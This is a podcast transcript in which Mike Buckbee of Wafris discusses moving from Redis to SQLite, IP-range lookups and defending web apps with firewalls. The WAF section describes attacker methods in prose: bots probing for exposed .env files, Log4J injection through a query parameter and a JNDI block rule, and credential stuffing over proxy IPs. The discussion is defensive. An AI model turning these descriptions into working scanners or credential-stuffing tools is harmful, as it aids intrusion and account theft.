Software Huddle - Blocking Bots & Moving from Redis to SQLite with Mike Buckbee

Episode Date: October 1, 2024

Today, we have Mike Buckbee on the show. Mike is the co-founder of Wafris, and he wrote a really insightful article last week about moving from Redis to SQLite for an aspect of their architecture. The... article was nuanced in describing why it worked for their specific needs, and it has some surprising takeaways, including that SQLite was 3x faster than a local Redis instance for their workload. Mike has built a few different WAF (Web Application Firewall) products, so we covered that area as well. He's seen a lot here, so we walked through all the nefarious traffic patterns and the speed in which these bots adapt to new vulnerabilities. Finally, Mike has a wide-ranging skillset that includes marketing. Developers are notoriously tricky to market to, so we talked about his experience in effective marketing to developers without being disingenuous. Links Blog Post: https://wafris.org/blog/rearchitecting-for-sqlite For A Good Strftime: www.foragoodstrftime.com IP Lookup: wafris.org/ip-lookup Timestamps 01:11 Start 03:41 Wafris 07:22 Redis and SQLite 19:09 Flatfile 21:50 Knowatoa 28:22 Web Application Firewalls 46:21 Jumpstart Pro 48:11 Marketing to Developers

Transcript
Discussion (0)
Starting point is 00:00:00 I think it's a misnomer that developers don't care about security. Like, I hear that a lot from security teams, which is the security team being frustrated that, like, hey, I'm trying to get these developers to fix this thing. And they're coming back that, like, is that really an exploit? I tried to do this thing. It's not fun stuff to work on. And I think their takeaway is that developers don't care about this. I think developers care a lot about the security because I think they're conscientious. And part of making good software is making software that
Starting point is 00:00:29 doesn't harm your users. How sophisticated are, I guess, the bad actors? Is it pretty sophisticated stuff or what's that look like? For sure, there's stupid bots out there that do like slash WP admin to every rail site and just, you know i've seen those for sure yeah yeah for sure well and that's because there's a lot of that out there but those bots they still there's enough intelligence to them they because they're trying to be efficient like imagine you were writing a malicious bot like well i'll check for the most common thing but whatever the headers come back with then i can do a follow-up too i want to i would talk a little bit about web application firewalls generally,
Starting point is 00:01:05 because you have some deep expertise in this area. And I guess, how did you get interested in this idea? Hey, folks, this is Alex. And today we have Mike Buckbee on the show. He's the co-founder of a couple of companies, including Wafris. And he wrote this really cool article this week that I saw about how they re-architected and moved from Redis to SQLite in how they do Wafris for client installations. And I just thought it was really interesting how he laid it out. Like, hey, some of their unique requirements,
Starting point is 00:01:29 some of the testing they did, why they did it. And I just love posts like that. We got to talking and decided, hey, let's make an episode about that. So we talked about that re-architecting. We also just talked about WAFs in general because he's got some pretty deep expertise in this stuff. So just like what that looks like,
Starting point is 00:01:43 what some of these problems are and how you should be protecting your stuff. We also just talked about Rails and marketing to developers, a lot of good stuff. In this episode, I really liked talking with Mike. If you want to reach out and you know, with suggestions or comments or guests you want to have on the show, anything like that, feel free to reach out to me or Sean. With that, let's get to the show. Mike, welcome to the show. Hey, thanks so much, Alex. It's great to be here. Yeah, sure. Well, I found a post you wrote earlier this week, and it was like one of my
Starting point is 00:02:11 favorite posts that I read this year. I thought it was really great. And we just started getting to chatting and thought it'd be good to have you on the show. I want to talk about that post and a lot of other things you're working on. You're the co-founder of Wafris, but maybe for people that don't know, you can give us a little bit of background on you and Wafris. Oh, sure. Yeah. So I'm a software developer and founder and have really straddled the line between a lot of marketing activities and software development and worked for lots of different companies. I've worked for some YC startups. I've worked for like some really big companies. I've worked for the U S Navy. Um, so pretty much the whole gamut of things.
Starting point is 00:02:50 Uh, and you know, through that, you know, hopefully have learned, you know, to do better and better at this. And, uh, something I'm very big about is actually trying to put things out there instead of just like trying to do a side project and it kind of languishes, but to actually like hit publish on it, put a domain on it and let it live out there. And so I've tried to do that for a number of years and to try to, the phrase I like is like stacking bricks. So I've got a whole lot of different things, but you know, that stacking all these bricks to try to build something bigger. And yeah, that's where I'm at today. Yep. Very cool. cool yeah it makes sense
Starting point is 00:03:25 that you have like a bit of the marketing background along with the development just like how well done this this post was i think and like a few other pieces of content that you have on the wafer site and then you shared some like side projects as marketing that you've done so yeah a lot of a lot of cool stuff um with that that i want to talk about but i want to start like with this this post because this sort of kicked it all off. So this post is re-architecting Redis to SQLite. And like it says, you're talking about migrating a portion of your architecture from Redis to SQLite. Some interesting stuff I want to get into, but I guess my favorite parts of it is you're just laying out your requirements, which were somewhat idiosyncratic compared to like other application requirements, describing those, like why they were important, how they affected the final solution,
Starting point is 00:04:08 and like why that resulted where you went. I guess maybe, maybe tell us about Wafrus and how it works. And then just like, we'll go into like your general constraints or needs around this part of your application. Sure. So Wafrus really comes about, you know, I think like a lot of stuff from my own personal frustrations. And that's really, there's really two angles on, you know, I think like a lot of stuff from my own personal frustrations. And that's really there's really two angles on that one. I run a very enterprise web application firewall that lives in the Heroku ecosystem called Expedited WAF. And it is a classic sort of firewall where it's for enterprise customers. It starts at quite a high price point.
Starting point is 00:04:43 It's a little tricky to manage, though we've done as much as we can with that to make it easier. But it's certainly not the default. And that's what we see is everybody gets hit. It's indiscriminate. And literally, it's to the point where bots that are scanning for vulnerabilities, they don't really go out and pluck out like your site or my site. What they do is they hit every IP address in an address space. They hit every single website on this giant list. So there's a real need for default security that's not present. And the other piece is what comes up from the open source world is lots and
Starting point is 00:05:19 lots of great things as far as like individual libraries, but it's not really a system. And so we're trying to have a different take on this. So Wafris is in the case of like a web framework, like Laravel, Rails or Express, it's a middleware, you put it into your application, and then you have a whole range of tools that you can use to stop attacks, you can block by user agents. And this is one of the things that if we were starting today as like a profession, we'd say, hey, you know what? We can all look in our logs and find all of these crazy IP addresses doing horrible, stupid things. So obviously it's got to be easy to just like one click block this IP address from doing that. Oh no, no, that's a whole
Starting point is 00:06:04 other thing. And so in most cases to do that, you have to actually like hard code something into the application, push it out, do a deploy. And as soon as you do that, there's 10 more IP addresses that have come in that are doing something else. So most people give up and they have poor security.
Starting point is 00:06:19 So that's the other angle. So we're trying to make it more of a default, have an open source solution so it can be widely deployed, and make something that works in lots of different environments. I mentioned web frameworks, but also like ingress controllers, like traffic, HTTP servers, like Nginx and Cadi. So it has this very broad sort of set of requirements and a very deployed, it's not an internal SaaS in that respect. Does that make sense? Yeah, I think so.
Starting point is 00:06:52 And so as I understand it, you have hook-ins to these different web frameworks and things like that. And with that, they can sort of call out to something to figure out, hey, should this request be blocked or not? Yeah. The easiest thing to think about is an IP address that, hey, this request is coming from a certain IP address. Is it something we should block? And just there's a lot of other things in there, but that's the easiest.
Starting point is 00:07:20 You know, is this on a block list? Yep. Yep. Gotcha. Okay. So diving in a little bit just in terms of how it works. If I'm a Rails developer, I sign up for Wafers and do this. I integrate this middleware into my system. A request comes into my Rails application. Where is that thing that it's going out to on the hot path to figure out, hey, should this request be allowed?
Starting point is 00:07:40 Just get a sense of how that's working. Yeah, so this article was about moving from redis to sqlite for the clients so in rails and again this works the same in all the frameworks um in v1 of this which was a mistake was we had chose the basis on redis and our assumption was like oh well you're setting up your web stack you have you know a relational database you probably have redis sitting there so just use redis and it's right there in handy that was an assumption that was wrong you know we just flatly and and just to be clear on this so like even though i'm using guafras in some sense as as a service from from you all it's actually like on my own redis
Starting point is 00:08:22 infrastructure somewhere like within my application. Yes. Yeah. A model. I don't know if you're familiar with Sidekick, which is the async. That was really our model. We're like, oh, what if we made like a Sidekick, but for what application firewalls? And the performance characteristics of Sidekick, and again, this is not in any way a knock on Sidekick. It's just it's a different
Starting point is 00:08:45 thing. It can be less because it's not in the hot path and deliberately so. So if you have a Redis that actually takes like a hundred milliseconds to respond because it's across the network, that doesn't matter so much because it's just in queuing jobs that get taken care of and come back. When that's like, Hey, should we show the homepage to this bot or not? That falls apart. Um, and so we had done a tremendous amount to really make Redis fast that we, um, I don't know if you're aware of this, but there's a whole like Lewis scripting language you can run inside of Redis. And so we had this whole system that did this in it from a technical standpoint, it was really cool.
Starting point is 00:09:25 And from throughput standpoint, it was really great. But altogether, it failed. And it was very difficult to set up Redis for our customers. And you really needed to go in and tweak some internals and do some stuff. And it was just a pain. It was just a huge stumbling block. So that was version one. So version two is basically if you just add the gem and you're set, it's a whole other experience.
Starting point is 00:09:54 And what enabled us to do that was we had switched from Redis over to SQLite. And I don't know if there's other parts of, I don't know if there were specific things you want to talk about in there, Alex, but yeah. Yeah, for sure. I mean, I think, I think like, just thinking about some of the very unique requirements there of like, hey, this is, you know, deployed to a customer and given directly to them. So it's not like they're calling out to you and it's like, hey, what do we use in our stack behind our API of like Redis or SQLite? It's like, no, actually, this is getting pushed out to a customer. And so we need like, one of the major factors there, as I understand it, is just like ease of setup for them and just operational ease, right on on some of that stuff. You know, I mentioned earlier, you know, I try to like, put things actually out there for people to
Starting point is 00:10:39 use and get feedback on and do stuff. And when and it's so hard to do that. Like you always want to work on stuff more before you show it to people. But one of the things we really found when we put this out there was that there's more and more distributed systems out there. Like even in somewhat monolithic applications. And so we're a partner with fly.io. Like we're working on web application firewalls for them.
Starting point is 00:11:05 They were the first ones to get the V2 of the rails. So they have from their DNA, a very distributed system. So when you deploy to fly, it's awesome because you can spread out and be on all these different regions and do all this different stuff. What you can't have is a single monolithic Redis that works across the Argentina region and the Tokyo region, as well as U.S. East, you know, U.S. East in quotes, all at the same time and have it be performant. And so in a lot of ways, this was specifically designed to work in those kinds of environments where instead of there being like one Redis server that all these different applications all come up to, it pulls down the individual SQLite databases to all of them.
Starting point is 00:11:50 And so we built a sync architecture to make that happen. And it works so much faster. Yep, yep. And I think that's another interesting point. You're like, hey, Redis wasn't great for me because I'm distributed. And it's like, a lot of people would be like, wait, so you went to SQLite,
Starting point is 00:12:03 which is like basically a single file somewhere. And would be kind of weird but again like unique requirements there of rights are pretty infrequent to your to your like updates around rules and things like that are pretty infrequent and and like not super time sensitive right so when they do happen you're actually just like taking that whole sqlite file and distributing it to all these different locations. And every, you know, app server essentially has that file locally. And it's not calling out to some remote service. That's exactly it. Yeah.
Starting point is 00:12:34 Well, and so what's interesting to me, and this is a lot of what I try to get across in the article, is I think what's changed in the last, you know, five, ten years of web development is like what is hard and what is easy like it's actually easy to distribute 100 megabyte sqlite database files and it seems weird in the context of web applications but every mobile app you use silently does this all the time that when you know my son plays um run kingdom, which is this incredibly complicated game of like candy real-time strategy, social thing. Anyway, it, every, you know, the whole thing is a SQLite database of downloads of like, here's the king of the cookies, you know, like, and has 20 hit points, like all of that stuff. So it's just a standard in the mobile application world that, you know, we've just not picked up on the website so yep yep so i think that's super interesting and like one thing when i like started to read
Starting point is 00:13:32 it and saw hey uh you know sqlite was three times faster i'm like okay that kind of makes sense because it's not making a network call out to redis and all that stuff but then like as i reread it again that test was even like with a local redis so it's like not even you know some network hop to a different database which which i kind of surprised me a little bit um i guess like i have a few hypothesis do you have like any hypothesis like like what are your thoughts on like why local sqlite beat local redis without even sort of the network network hop aspects there well i think first think first off, let's not discount. Maybe I did something really bad in the benchmarking. Like honestly, no, no, it's, it's true. Like, yeah. Like you
Starting point is 00:14:11 mentioned in the thing is like benchmarking is really hard because you have to like be expert in sort of everything you're benchmarking or else you're not, it's hard, but yeah. Anyway, go ahead. Yeah. Well, and that's sort of the starting point of it is that like, if, if I, as the person who's worked extensively with Redis is writing these incredibly complicated Lua scripts in it, we had an official partnership with Redis as well, like signed, you know, partnership with Redis. If, if we can't get this Redis to be correct in a reasonable way, what hope do our users have? So that's part of it. So that's part of it. I think from a technical standpoint, and there is a really big Hacker News discussion about this. And in there, a lot of people with, I think, even more knowledge than I really came to the conclusion that what's happening is that the Redis connections are still over sockets.
Starting point is 00:15:07 So it's like serializing, deserializing this into Redis's protocol to do the queries. And what I was testing, like, so a little bit of background. So the big thing that we have to deal with, like the worst, most, most pathological thing we have to deal with is really trying to figure out if an IP address is in a range. And so I don't know if you've worked with IP address as much, you know, not enough. So you'll have to educate me here for sure. So here's, here's the two challenges. There's two sets of IP addresses. There's IPv4 and IPv6. Fair enough. And the naive way to handle this and the way we started was, okay, well, this is great. We'll take the IP addresses and we'll take them and we'll take the range and we'll split it into integers.
Starting point is 00:16:00 And then we'll see if it's between these two integers. There's a bunch of inherent issues with that with IPv4, but they can be dealt with. And but let's look at IPv6, which is much bigger. And then the energy you get back is bigger than a big int. And so that's a that's a problem. And what you find out when you really dig into this, if you look at like the IP lookup, the IP handling libraries and all this, it's really like a kludged together set of like optimized regexes and like heuristics for pulling apart the IPs into this different stuff. So originally in Redis, what we did was we used a sorted set, which is usually used for leaderboards.
Starting point is 00:16:42 So you have like a key and then you have a value and the value has a number. And as that number changes in increments, it automatically reorders it. So you can have millions and millions of people in this and it's very easy to take out a slice. And it's like, oh, well, Alex, you're 500th. And so here's the next 50, that kind of thing.
Starting point is 00:17:01 If you take that sorted set and make everything the same score, it then reverts to doing what's called a lexical index which is basically just like alphabetizing it so we take the ip addresses make them into integers zero pad them and then add uh like a dash and like a number to them that indicates like, oh, this is the country. So Argentina is like a one. And so we'd have a range that's two entries in that sorted set and then do a range and a reverse range on the same number. So it's really like two queries for that IP address. And then if those rule numbers, that's the suffix on it are the same, we know it's in that range. Otherwise it's not, it's not even real simple to explain. And a lot of people were
Starting point is 00:17:54 speculating on better ways to do it with like bit fields and stuff. I would love if there was a better way. I tried so many things. I've had so many people like nerd snipe me over this. So anyway, so we implement that in Redis and we implemented the same thing in SQLite because we couldn't still figure out a better way to do it. And so SQLite is just faster for this weird query. So yeah, yeah. Those are going to be my two guesses. Like, hey, you still have some network serialization, deserialization, even for local Redis. And then, like, Redis has some great data structures, but not the perfect data structure for this.
Starting point is 00:18:30 And just reading some of your responses in that Hacker Noob post about how you, yeah, sort of set with zero value. Like, I was like, oh, I wonder how a sort of set works there with just a giant blob of all the same scores and things like that. Whereas, like, this is like a perfect B-tree application in SQLitel white for for that sort of thing so yeah that's that was like super interesting but i think like um again just like going back to thinking about your specific needs hey you had like kind of this weird access pattern it's a little tricky for redis also like you know needing to make it easy for your clients being able to distribute it like sort of asynchronously and updates and things like that just make it a nice fit for SQLite. So I thought that was super fun.
Starting point is 00:19:10 Some people I know like ask like, hey, why didn't you just use a flat file? Do you think about that at all? Oh, yeah. So I mentioned like, oh, here's all the stuff we're doing. So we have to maintain different lists of that. And the big ones are we have to maintain both GUIP database that, you know, you imagine that's huge, that's millions of records. And then we also have through a whole mix of sources, because we run this other enterprise WAF, an IP reputation database, that's also millions of
Starting point is 00:19:41 records. So, so if you imagine a JSON file, you know, or whatever kind of flat file, well, with millions of records in it, well, now you have to build an index on it and then sort of now you've built SQLite. So we give up on that pretty quick. Yeah. It's like people are like,
Starting point is 00:20:00 why not a flat file? And it's like, well, SQLite almost is a flat file. Plus they've got a bunch of nice stuff on top of like, why would I recreate compression and indexes and whatever they're all doing there? This isn't, this isn't me. I know there's been a couple of attempts,
Starting point is 00:20:11 like for people that are doing stuff where they want to have like, um, like for Figma or design applications. And they'll use SQLite as the data format for like the export and stuff. Like it's just such a cool little database for stuff like that yeah for sure um just a side note on redis like there's a there's a note you mentioned in there about being at rails world 2023 and feeling like some blood in the water about redis is this like what's going is that about the license change is that about just like i think more
Starting point is 00:20:41 vibes towards running simpler architecture or like what, what was that about? So I think it's a mix of things and it's interesting. So I was just at LaraCon, um, first Laravel conference I'd been to and was at Railsworld and Railsworld is happening now, um, for 2024. And there's a real divergence where, you know, DHH and the Rails world is like, you should run it yourself. And I think, you know, if that's, if that's's your goal what you want to do is strip out all the complexity and the same way we did with like yeah you can get rid of redis use sqlite it's a lot simpler and
Starting point is 00:21:14 that's sort of that's sort of where they were going as well i think which is trying for a simpler architecture they just got rid of the traffic as an ingress controller and have come on proxy now so it's a simplification of it and sequel light i think really fits with that story well yep yep interesting um we were talking a little bit before we started i've been like one thing i love about the post is it felt like it was written by a human it didn't feel like something that ai could create it like had some life and just like a little bit of soul human. It didn't feel like something that AI could create. It had some life and just a little bit of soul to it. I feel like I can feel your personality coming across, which is great. You mentioned another project you're working on, Noa Toa.
Starting point is 00:21:53 Tell me about that. Yeah. So, you know, in general, I'm a man of many side projects. And the side projects spawn side projects and things. So this actually came out of a discussion I was having with some other SAS owners, which is everywhere you look, you know, like, especially developers, I don't know about you personally, but the rise of AI tooling for development has absolutely murdered the number of Google searches I do in any given week, like just massively. And what does that mean
Starting point is 00:22:28 for people finding my, my SAS, you know, in these. So if you go into chat GPT and you look for like, what's Wafra is like, does it have the right information? Does it do all this? And so I had started with literally a, it was a Ruby script that started going through the APIs and would like look for these sorts of things and then spit out a CSV. Then I had like a half dozen other like SaaS owners and SEO people. And I would like every week I would send them this CSV, like, Oh, hey, I reran the numbers on this new model and just got a little bit of traction and interest, um, from that. And then I started reaching out to a few like SEO agency people and they're like, oh, this is great. Not because there's a huge amount of volume of this.
Starting point is 00:23:12 And it's really tricky to see because it doesn't have attribution, but they really wanted to, it's something that's real. Like, I think that's the bottom line is there is definitely more people looking in these systems than, than we know. And so Noa Toa was now a SaaS that lets you go to, you can go to the site and put in your domain and it will figure out your competitors and it will figure out like, Oh, here's looking at all the actual keywords for your site. Like it pulls like a thousand keywords for your site. Then it pulls like a thousand keywords for your site. Then it says like, well, a lot of these are informational. Like, hey, what's a proxy server?
Starting point is 00:23:51 What's an XYZ? AI will just answer that. So we're not even going to worry about those. And we're just going to focus on these like high intent questions. Like what's the best XYZ in Dallas? You know, that kind of stuff. And then it gives them, and then it does all the math and gives you a nice report of all that information. I'm like, oh, well, this is doing better here. Your competitors showing up better here. And we're still working on this, but internally I'm tracking
Starting point is 00:24:14 a lot of like data source stuff and a lot of tying back to the security. A lot of the things for optimization mirror, a lot of the things you would do with LLM security, like trying to figure out data sources and trying to sort out which bots are hitting my site. Like, can all the AI bots scrape my site? Like, is that good or bad? You know, all those sort of different things. Yep. Interesting. Have you seen, you know, tracking this over time, have you seen big differences in how like Wafris, for example, is showing up in in these different like as the models upgrade and update their information and things like that?
Starting point is 00:24:50 Oh, yeah, absolutely. I mean, I think a misconception and this is also this is how I learn about stuff like, you know, Wafris. There's a lot of things that are maybe AI tangential, but not really AI straightforward. And it seems like such a big thing. How do I learn about it? I do side projects, you know. So something I came to realize is we talk about these models like GPT-4, and I think we think of that as like a block, but it's not. And they're constantly tweaking and changing things behind the scenes and if you
Starting point is 00:25:26 want they actually have like if you're using that the api they actually have a model that's just called like gpt for latest you just call that and you get whatever you want and that kind of makes sense like occasionally i don't know if you remember there was like a couple days where uh where chat gpt was like a crazy uncle, like no matter what you put in, it just came back with like insanity. And then they're like, Oh no, no, no, we reverted that. We fixed that. So there's a lot of that happening. And yeah, I think it's, it's really hard to know right now. Like it's just hard to know, like, is the information in there correct about my company? Is it doing this? And like I mentioned, I had talked to a bunch of SAS founders,
Starting point is 00:26:10 pretty much at this point, all of them have said, yeah, I talked to someone who said they found me in chat GPT that, and the pattern is they do research in the LLMs and then they do a navigational query in Google. So they look up, hey, what's the best transcription software for this? And it comes with a bunch of names like great. And they put that name in and they go to the website. But yeah. whether through reference or through other ones that you're tracking, I guess like see some marketing of strategies or things like that in non LLM world, whether it's SEO or new posts and things like that and see like,
Starting point is 00:26:53 Oh, now there's a lift in them getting mentioned in some of these, these queries in LLM. Like what is the best web application thing for rails or something like that? Is there stuff you can do in the non AI world that's having an an impact there is that too hard to track oh yeah well so a way to track that is and it's you know i think it makes sense which is you can look at the difference between what's in the search results page and what's in the results that come back from the lm so you can see oh
Starting point is 00:27:22 there's some new and this is an opportunity. It's an opportunity. Like if you're in a really competitive space, it's hard to break in on the SEO side. Maybe this is a chance to break in on the, I call them AI search services because they're kind of blurry on the AI search service side. And definitely like some of the folks who have been much more active on Reddit, much more active on like forums and things like that. And I think another piece of this is, if there's a piece of advice, LLMs are very straightforward, I think, compared to the traditional search. So if you don't have something that says like, yes, Wafris is the best web application firewall, the LLM won't know that you're the best application firewall.
Starting point is 00:28:10 So, because a lot of that, especially in the business world, like, you're almost trying to imply all these things. Yeah. They aren't real subtle. So, yeah. Yep, that's interesting. I want to talk a little bit about web application firewalls generally, because you have some deep expertise in this development, cybersecurity work, and marketing. Like those are the three sort of things. And so I've done a lot of different permeations of all of those things. So. And was one of those first, like, did you start as one and start to like add more skills on or like, or were you just like, Hey, just brought indie hacker from childhood?
Starting point is 00:29:02 Yeah, certainly I started as um a software developer you know learned web development and then just by the nature of the clients i had which was a lot of education and uh my background like when i was originally doing corporate stuff really came in working for the navy working for hospitals working for like 3M health information services, like very regulated environments, very, you know, kind of different things. So yeah. So like at the Navy, I had developed a rails app that helped with Navy personnel when they're leaving the service, they have to get like a comprehensive list of all of the injuries and health issues that they've had. And this is a huge pain for the doctors to generate this because it's just paperwork,
Starting point is 00:29:50 but it has a huge impact on the lives of those people because if they don't have everything listed, then they don't get benefits and they don't get supported post Navy. And so I wrote the system that like extracted and put all this together in a real like early form. And it was great for that. You know, it was like a real positive. But, you know, it has to exist in this very secure environment. It has to meet all these things. So a lot of this came out of that.
Starting point is 00:30:16 I had, so early in Heroku's lifespan, they came out with the platform API. And while it was still in beta, I had noticed that they had a method of programmatically applying SSL certificates. And so this is way before let's encrypt stuff. So that was really my first big win was I developed a system for automatically producing those and installing them and getting it to work. And so I still run half a dozen add-ons in the Heroku marketplace. And then the biggest of those is expedited web application firewall, which really came out because let's encrypt came out and was a much better solution, both, you know, from a cost standpoint as well as like a user experience standpoint.
Starting point is 00:31:03 And I think maybe I took those lessons to heart with the web application firewall pieces. So yeah. Interesting. Okay. So I guess like maybe even just educate me on WAF generally, I guess like how bad is this problem? Why is it,
Starting point is 00:31:17 why is it needed so bad? Is there, they're just like bot armies out there just scanning all sorts of, you know, like you're saying IP addresses and web addresses and everything. Yeah. I think there's, there's an external and an internal reason for it. Most of the people that I talked to really fall into three buckets.
Starting point is 00:31:32 One, they're trying to get like SOC compliant or some other compliant thing, and they need a web application firewall sort of for a checklist. And those people are very reluctant customers. But I've found that oftentimes they become a lot more enthusiastic after it's installed and they're actually using it. Because really all a WAF is is a toolbox. And I think as developers, we love our tools. We love like adding in new libraries and doing all this stuff. And so that's the one group is people trying to get compliant.
Starting point is 00:32:01 The other group is I'm a small SaaS, uh, I'm a small, uh, SAS, and I'm trying to interact with this bank. I'm trying to interact with this bigger company where I just got acquired and they looked at what we're doing and then freaked out and said, like, you need to get a WAF immediately because you don't even know if you're under attack. And the third group is just, oh boy, we looked in our logs and saw a lot of weird traffic. And again, it's mostly bots. So I had a company that was an HR, like if you have an incident inside the company, you can anonymously report it to this external SAS. And they sort of handled the complaints and things.
Starting point is 00:32:39 And they found out a third of their traffic of the number of requests to their website was from China. They only do business in the U S it's not, and it's not even to say like, it's, this is a malicious Chinese cyber attack that was targeting them. No, it's just these bots that are launched from China. Some of them are like even search engine bots and all these things, but all it takes is like a little misconfiguration for like all that data to be out there. Yeah. Yep. Interesting. And so are these mostly, I guess when people sign up for Ralph, is that almost always about blocking traffic that's not true valid traffic? like, you know, maybe they're making some sort of developer tool and they need to have like some actual rate limits on people that are hitting their API in like a programmatic way that could
Starting point is 00:33:29 shut down their application. Like, is there much uses of that? Or is it mostly like, hey, you know, just like truly invalid traffic that we don't want to have happening? It's truly invalid traffic. I mean, it's not a good solution for doing API based rate limiting. It's a much better solution for doing things like, well, again, I mentioned it's like a toolbox. And so the toolbox is we, and especially with Wafris, we've really tried to collapse the loop of all this stuff where you can certainly look in your logs.
Starting point is 00:33:59 And so people do this. They take their logs and they ship off all their logs to like some massive elastic search cluster. Then they write like these complex queries to dig through it. And they're like, okay, we found out last week that there's these many IPs. And like, why is one IP address, like 90% of our traffic, like that kind of stuff happens. So we have a visualizer that tries to make sense of all that stuff. And then you can one click block it. You can also like, you know, try to do some programmatic things, but that's a lot of it. And the other things are,
Starting point is 00:34:29 there's a lot of configuration stuff. So you can block countries, you know, which is very useful just to reduce your surface area. We had someone who had to block Canada and there's no like real thing with Canada. It was just like there were proxy servers in canada that people were using to attack their site we often find that's the case um yeah so things like that like very very practical sort of stuff so yep how sophisticated are i guess the bad actors is it is it pretty sophisticated stuff or what's that look like it really depends i mean for for sure there's stupid bots out there that do like slash wp admin to every rail site and every just you know i've seen those for sure yeah yeah for sure well and that's because there's a lot of that out there but those bots they still there's enough intelligence to them they because they're trying to be efficient like imagine you were writing a malicious bot like
Starting point is 00:35:22 well i'll check for the most common thing, but whatever the headers come back with, then I can do a follow-up too. Oh, interesting. Yeah. Okay. So I see a lot of that and we see a lot of those IP addresses that are making those things act as reconnaissance where there's, you know, this is, this sounds like I'm making it up like a Cold War thing, but really Eastern Europe has a lot of data centers that they're like, yep, sign up for us. We're cool with spam and malware. And they change IP addresses.
Starting point is 00:35:55 But if you see a bot that if you get hit with that WP admin thing, you know like, oh, well, this IP address is making this request. That's bad. So we're going to block it and so then the next thing that it comes out with you can block that as well so yeah yeah okay that's pretty interesting um just just to kind of close the loop i guess like wafers you you have some sort of centralized thing somewhere where people actually tweet their rules and all sorts of stuff yeah um i guess like tell me a little bit about your architecture there. I imagine you're not using SQLite as your database
Starting point is 00:36:26 for your centralized thing. What are you using there? Well, that looks much more like a normal Rails app or whatever. And hub.wafers.org, you can sign up for a free account and go in. And if you're on Rails, you automatically get the V2. And so if you have the gem installed, it really just looks for an API key. It functions very similarly to like exception monitoring services.
Starting point is 00:36:49 So like Sentry or any of those, like you set up a key and it sort of handles things. Yeah, and it would just work. You can go in, see like, oh, most of our requests are from, you know, Buenos Aires. We don't do any business there.
Starting point is 00:37:03 That's sure weird. So we're going to block that, you know, Buenos Aires. We don't do any business there. That's sure weird. So we're going to block that, you know. Yep. Yep. For that visualizer aspect, which we're talking about a fairly high amount of data, sort of analytical queries, very ad hoc and interactive for users. I guess, like, what are you using for that? Has that been a hard problem technologically to solve? We're using Redis.
Starting point is 00:37:22 Oh, wow. Okay. We're using Redis on the server. Okay. We're using Redis on the server. So, okay. So is that like pre-aggregated and like you're just sort of aggregating in different ways. So there's like some flexibility
Starting point is 00:37:31 on how you slice and dice, but not like sort of unlimited SQL querying capabilities. Well, at the end of the day, these are log files, you know, so there's only so many ways to chop them up. And there's only so much data
Starting point is 00:37:44 we're actually taking in. So, you know, so there's only so many ways to chop them up. And there's only so much data we're actually taking in. So, you know, grouping on, cause these are, this is weird. Most people, I don't think have ever seen a list of like, here's your top 10 IP addresses that have made requests to your site in the last week. Like, yeah, that's not a crazy thing to ask for. That would be very useful, but that is a hard thing to get out of most of these systems. And this is kind of what I was going back to. Part of our larger goal is just to raise the default, like the default level of security we as application developers have with our applications. More control, more security, because there's this horrible asymmetry to this where it's so easy to write
Starting point is 00:38:26 a bot and like we do this in my talks like hey you want to write a bot and it's basically just a curl script you just write curl and then you wrap it a little bit of bash and you just give it a list of domains and it just goes out and hits all those domains looking for like oh did you leave your dot env file in the root like you might not but one of the 5 000 people were looking for today did so you know yeah all that kind of stuff so yep for sure um what about you know there's a new vulnerability that came out i think yesterday cups or whatever that had like this 9.9 out of 10 score or like heartbleed how quickly between like those vulnerabilities being released,
Starting point is 00:39:06 do you start to see bots trying to exploit that? Is that like immediate? Like, is that within a day? Oh yeah. Yeah. Um, so heart bleed was an SSL vulnerability.
Starting point is 00:39:17 So you had to update your TLS libraries and things. Um, I think a better one is log for J. I don't know if you're familiar with that one. Yeah, sure. Yeah. So log for J I was really know if you're familiar with that one. Yeah, sure. Yeah. So Log4J was really bad for people that aren't aware of it.
Starting point is 00:39:30 Log4J exploited a Java logging service. And basically, you could very easily write in commands that would then be executed by that service. So you could write in like, hey, post out all the data from the log files to this external server. And you could actually go in. So like, so I'm running a rail server. I'm serving up my images out of it. I could go in and like go to logo dot PNG and then put in the parameter question mark and then put my log for J command in there. My rails app doesn't actually do anything, but I'm using a service that ships
Starting point is 00:40:05 this off to, you know, some other thing that does use log for J that service then pulls out all the logs and sends it off. So yeah. So that stuff happened almost immediately and it was a huge, it was a huge scramble, but you know, for expedited, which is the enterprise service, we, that day, you know, started patching for everyone. And everyone was just covered. And that's a very managed service. You know, with Wafris, you can do something very similar. We help with that. You can go in, like, the immediate response is, like, the protocol for blog4j was, like, JNDI.
Starting point is 00:40:44 So if you went in and just block, that's an unusual string. Like you block any path that has J and D I in it. That's not everything, but that's like, again, you're cutting down the surface area of attack. You're cutting down like the probes, figuring out that. Oh yeah. Like, yeah, it's easy to get to this, you know, site. So, yeah.
Starting point is 00:41:00 Yeah. One thing you were talking about before we started here is just like how security and developers, how they think about it. Hey, they, they, they learn this stuff within their application framework, but sort of once it goes over that boundary, it's just like, they don't have a sense of it or something like that. Could you, could you dive into that a little bit and what you see or like where devs could, I think,'s a misnomer that developers don't care about security. Like I hear that a lot from security teams, which is the security team being frustrated that like, hey, I'm trying to get these developers to fix this thing. And they're coming back that like, is that really an exploit? I tried to do this thing. It's not fun stuff to work on. And I think their takeaway is that developers don't care about this. I think developers care a lot about the security because I think they're conscientious.
Starting point is 00:41:48 And part of making good software is making software that doesn't harm your users actively. And I talked to a lot of developers. I think it's mostly about tools, that we haven't given developers good tooling for this kind of stuff. And what I was really trying to get to was, you know, within the framework, like Rails or Laravel, if you use the proper form stuff, you're very resistant to like cross-site scripting attacks because there's a lot of stuff in there. But you do have issues of, well, what do you do if like you're running an e-commerce site and you're just being scraped? Your whole site is just being scraped every item.
Starting point is 00:42:27 And then your competitor is just going through and marking all their items 10% lower, cheaper than yours. And I'll bidding you like that's, that's not exactly, that's not a SQL injection that you're trying to deal with. Like that's an operational issue or the big attack we see, like the number one, like serious attack we see against SaaS apps by far is credential stuffing, which is that you just put in a username and password and you try like over and over again with different ones. And typically we see those attacks so large that they sent, they accidentally DDoS the site. And so a very common response to that is, okay, well, let's put in rate limiting. And so you put in rate limiting and you say like, well,
Starting point is 00:43:11 no more than like five attempts an hour. And you're like, that sounds very reasonable, except that the attackers for a couple bucks are buying thousands of these proxy servers. And so they have all these different IP addresses. So they have a thousand IP addresses. Well, that's 5,000 attempts an hour. That doesn't really solve the problem. That's still quite a bit. So, you know, you need these other techniques to then say like, well, we can block these proxy servers because we know these IP addresses have been used in bad ways. That's good. Block these from another country, block them on user agent, all sorts of things. So, and then that's how you deal with those attacks along with rate limiting.
